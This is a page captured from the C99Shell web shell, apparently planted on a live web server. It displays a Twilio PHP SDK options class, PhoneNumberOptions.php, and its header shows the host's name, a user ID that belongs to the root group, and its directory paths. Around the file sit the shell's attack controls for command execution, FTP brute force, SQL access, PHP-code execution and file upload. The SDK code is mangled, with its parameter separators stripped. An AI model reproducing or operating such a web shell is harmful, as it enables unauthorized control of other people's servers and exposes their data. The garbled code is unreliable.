!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/vendor/twilio/sdk/src/Twilio/Rest/Lookups/V2/   drwxr-xr-x
Free 28.63 GB of 117.98 GB (24.27%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     PhoneNumberOptions.php (8.78 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This code was generated by
 * \ / _    _  _|   _  _
 * | (_)\/(_)(_|\/| |(/_  v1.0.0
 * /       /
 */

namespace Twilio\Rest\Lookups\V2;

use 
Twilio\Options;
use 
Twilio\Values;

/**
 * PLEASE NOTE that this class contains beta products that are subject to change. Use them with caution.
 */
abstract class PhoneNumberOptions {
    
/**
     * @param string $fields Fields to return
     * @param string $countryCode Country code for national phone number lookups
     * @param string $firstName User’s first name.
     * @param string $lastName User’s last name.
     * @param string $addressLine1 User’s first address line.
     * @param string $addressLine2 User’s second address line.
     * @param string $city User’s city.
     * @param string $state User’s country subdivision, such as state, province, or
     *                      locality.
     * @param string $postalCode User’s postal zip code.
     * @param string $addressCountryCode User’s country, up to two characters.
     * @param string $nationalId User’s national ID, such as SSN or Passport ID.
     * @param string $dateOfBirth User’s date of birth, in YYYYMMDD format.
     * @return FetchPhoneNumberOptions Options builder
     */
    
public static function fetch(string $fields Values::NONEstring $countryCode Values::NONEstring $firstName Values::NONEstring $lastName Values::NONEstring $addressLine1 Values::NONEstring $addressLine2 Values::NONEstring $city Values::NONEstring $state Values::NONEstring $postalCode Values::NONEstring $addressCountryCode Values::NONEstring $nationalId Values::NONEstring $dateOfBirth Values::NONE): FetchPhoneNumberOptions {
        return new 
FetchPhoneNumberOptions($fields$countryCode$firstName$lastName$addressLine1$addressLine2$city$state$postalCode$addressCountryCode$nationalId$dateOfBirth);
    }
}

class 
FetchPhoneNumberOptions extends Options {
    
/**
     * @param string $fields Fields to return
     * @param string $countryCode Country code for national phone number lookups
     * @param string $firstName User’s first name.
     * @param string $lastName User’s last name.
     * @param string $addressLine1 User’s first address line.
     * @param string $addressLine2 User’s second address line.
     * @param string $city User’s city.
     * @param string $state User’s country subdivision, such as state, province, or
     *                      locality.
     * @param string $postalCode User’s postal zip code.
     * @param string $addressCountryCode User’s country, up to two characters.
     * @param string $nationalId User’s national ID, such as SSN or Passport ID.
     * @param string $dateOfBirth User’s date of birth, in YYYYMMDD format.
     */
    
public function __construct(string $fields Values::NONEstring $countryCode Values::NONEstring $firstName Values::NONEstring $lastName Values::NONEstring $addressLine1 Values::NONEstring $addressLine2 Values::NONEstring $city Values::NONEstring $state Values::NONEstring $postalCode Values::NONEstring $addressCountryCode Values::NONEstring $nationalId Values::NONEstring $dateOfBirth Values::NONE) {
        
$this->options['fields'] = $fields;
        
$this->options['countryCode'] = $countryCode;
        
$this->options['firstName'] = $firstName;
        
$this->options['lastName'] = $lastName;
        
$this->options['addressLine1'] = $addressLine1;
        
$this->options['addressLine2'] = $addressLine2;
        
$this->options['city'] = $city;
        
$this->options['state'] = $state;
        
$this->options['postalCode'] = $postalCode;
        
$this->options['addressCountryCode'] = $addressCountryCode;
        
$this->options['nationalId'] = $nationalId;
        
$this->options['dateOfBirth'] = $dateOfBirth;
    }

    
/**
     * A comma-separated list of fields to return. Possible values are caller_name, sim_swap, call_forwarding, live_activity, line_type_intelligence, identity_match.
     *
     * @param string $fields Fields to return
     * @return $this Fluent Builder
     */
    
public function setFields(string $fields): self {
        
$this->options['fields'] = $fields;
        return 
$this;
    }

    
/**
     * The [country code](https://en.wikipedia.org/wiki/ISO_3166-1_alpha-2) used if the phone number provided is in national format.
     *
     * @param string $countryCode Country code for national phone number lookups
     * @return $this Fluent Builder
     */
    
public function setCountryCode(string $countryCode): self {
        
$this->options['countryCode'] = $countryCode;
        return 
$this;
    }

    
/**
     * User’s first name. This query parameter is only used (optionally) for identity_match package requests.
     *
     * @param string $firstName User’s first name.
     * @return $this Fluent Builder
     */
    
public function setFirstName(string $firstName): self {
        
$this->options['firstName'] = $firstName;
        return 
$this;
    }

    
/**
     * User’s last name. This query parameter is only used (optionally) for identity_match package requests.
     *
     * @param string $lastName User’s last name.
     * @return $this Fluent Builder
     */
    
public function setLastName(string $lastName): self {
        
$this->options['lastName'] = $lastName;
        return 
$this;
    }

    
/**
     * User’s first address line. This query parameter is only used (optionally) for identity_match package requests.
     *
     * @param string $addressLine1 User’s first address line.
     * @return $this Fluent Builder
     */
    
public function setAddressLine1(string $addressLine1): self {
        
$this->options['addressLine1'] = $addressLine1;
        return 
$this;
    }

    
/**
     * User’s second address line. This query parameter is only used (optionally) for identity_match package requests.
     *
     * @param string $addressLine2 User’s second address line.
     * @return $this Fluent Builder
     */
    
public function setAddressLine2(string $addressLine2): self {
        
$this->options['addressLine2'] = $addressLine2;
        return 
$this;
    }

    
/**
     * User’s city. This query parameter is only used (optionally) for identity_match package requests.
     *
     * @param string $city User’s city.
     * @return $this Fluent Builder
     */
    
public function setCity(string $city): self {
        
$this->options['city'] = $city;
        return 
$this;
    }

    
/**
     * User’s country subdivision, such as state, province, or locality. This query parameter is only used (optionally) for identity_match package requests.
     *
     * @param string $state User’s country subdivision, such as state, province, or
     *                      locality.
     * @return $this Fluent Builder
     */
    
public function setState(string $state): self {
        
$this->options['state'] = $state;
        return 
$this;
    }

    
/**
     * User’s postal zip code. This query parameter is only used (optionally) for identity_match package requests.
     *
     * @param string $postalCode User’s postal zip code.
     * @return $this Fluent Builder
     */
    
public function setPostalCode(string $postalCode): self {
        
$this->options['postalCode'] = $postalCode;
        return 
$this;
    }

    
/**
     * User’s country, up to two characters. This query parameter is only used (optionally) for identity_match package requests.
     *
     * @param string $addressCountryCode User’s country, up to two characters.
     * @return $this Fluent Builder
     */
    
public function setAddressCountryCode(string $addressCountryCode): self {
        
$this->options['addressCountryCode'] = $addressCountryCode;
        return 
$this;
    }

    
/**
     * User’s national ID, such as SSN or Passport ID. This query parameter is only used (optionally) for identity_match package requests.
     *
     * @param string $nationalId User’s national ID, such as SSN or Passport ID.
     * @return $this Fluent Builder
     */
    
public function setNationalId(string $nationalId): self {
        
$this->options['nationalId'] = $nationalId;
        return 
$this;
    }

    
/**
     * User’s date of birth, in YYYYMMDD format. This query parameter is only used (optionally) for identity_match package requests.
     *
     * @param string $dateOfBirth User’s date of birth, in YYYYMMDD format.
     * @return $this Fluent Builder
     */
    
public function setDateOfBirth(string $dateOfBirth): self {
        
$this->options['dateOfBirth'] = $dateOfBirth;
        return 
$this;
    }

    
/**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    
public function __toString(): string {
        
$options \http_build_query(Values::of($this->options), ''' ');
        return 
'[Twilio.Lookups.V2.FetchPhoneNumberOptions ' $options ']';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0242 ]--